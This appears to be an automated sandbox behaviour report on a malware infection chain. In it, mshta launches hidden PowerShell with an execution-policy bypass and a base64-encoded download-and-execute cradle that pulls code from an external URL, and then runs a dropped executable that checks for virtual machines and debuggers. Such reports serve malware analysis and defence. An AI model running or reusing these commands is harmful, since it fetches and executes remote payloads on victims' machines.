Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6680	Thread sleep count: 2658 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6684	Thread sleep count: 6735 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6736	Thread sleep count: 31 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2658			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6735			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_08718E68 sldt word ptr [eax]

3_2_08718E68

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

API coverage: 4.6 %

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_00BCDC28 GetSystemInfo,

3_2_00BCDC28

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D8220 FindFirstFileA,FindClose,FindWindowA,	4_2_001D8220
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00188D50 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,	4_2_00188D50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001B4E80 FindFirstFileA,FindClose,	4_2_001B4E80
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00219652 FindFirstFileExW,	4_2_00219652
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00219703 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00219703
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001A9C60 GetProcAddress,FindFirstFileA,CloseHandle,	4_2_001A9C60

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: powershell.exe, 00000003.00000002.919764732.0000000008354000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\."
Source: powershell.exe, 00000003.00000002.919764732.0000000008354000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000003.00000002.919764732.0000000008302000.00000004.00000020.00020000.00000000.sdmp, sxnoX.exe, 00000004.00000002.2068202103.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_0021482D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0021482D

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_002136E1 GetProcessHeap,

4_2_002136E1

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_002163AF mov eax, dword ptr fs:[00000030h]	4_2_002163AF
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_002163E0 mov eax, dword ptr fs:[00000030h]	4_2_002163E0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00216424 mov eax, dword ptr fs:[00000030h]	4_2_00216424
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0020ABA2 mov ecx, dword ptr fs:[00000030h]	4_2_0020ABA2

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FE5BD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_001FE5BD
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0021482D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0021482D
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FEC1A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_001FEC1A
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FEC0E SetUnhandledExceptionFilter,	4_2_001FEC0E

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: amsi32_6620.amsi.csv, type: OTHER

Bypasses PowerShell execution policy

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==

Encrypted powershell cmdline option found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://communicalink.com/index.php")
Source: C:\Windows\SysWOW64\cmd.exe	Process created: Base64 decoded IEX (New-Object Net.Webclient).downloadstring("http://communicalink.com/index.php")			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nop -w hidden -ep bypass -enc sqbfafgaiaaoae4azqb3ac0atwbiagoazqbjahqaiaboaguadaauafcazqbiagmababpaguabgb0ackalgbkag8adwbuagwabwbhagqacwb0ahiaaqbuagcakaaiaggadab0ahaaogavac8aywbvag0abqb1ag4aaqbjageababpag4aawauagmabwbtac8aaqbuagqazqb4ac4acaboahaaigapaa==	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\sxnoX.exe "C:\Users\user\AppData\Local\Temp\sxnoX.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_0019C6D0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,

4_2_0019C6D0

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_0019C870 DeleteObject,AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,

4_2_0019C870

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetDesktopWindow,GetClientRect,CreateWindowExW,GetLastError,GetDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,ReleaseDC,GetWindowRect,GetClientRect,SetWindowPos,CreateBitmap,CreateCaret,SetScrollInfo,GetDoubleClickTime,GetSystemMenu,CreatePopupMenu,AppendMenuA,AppendMenuA,AppendMenuA,CreateMenu,DeleteMenu,DeleteMenu,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,AppendMenuA,GetKeyboardLayout,GetLocaleInfoA,ShowWindow,SetForegroundWindow,GetForegroundWindow,UpdateWindow,PeekMessageW,IsWindow,PeekMessageA,GetForegroundWindow,MsgWaitForMultipleObjects,DispatchMessageW,PeekMessageW,IsWindow,IsDialogMessageA,	4_2_001648D7
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0021897B
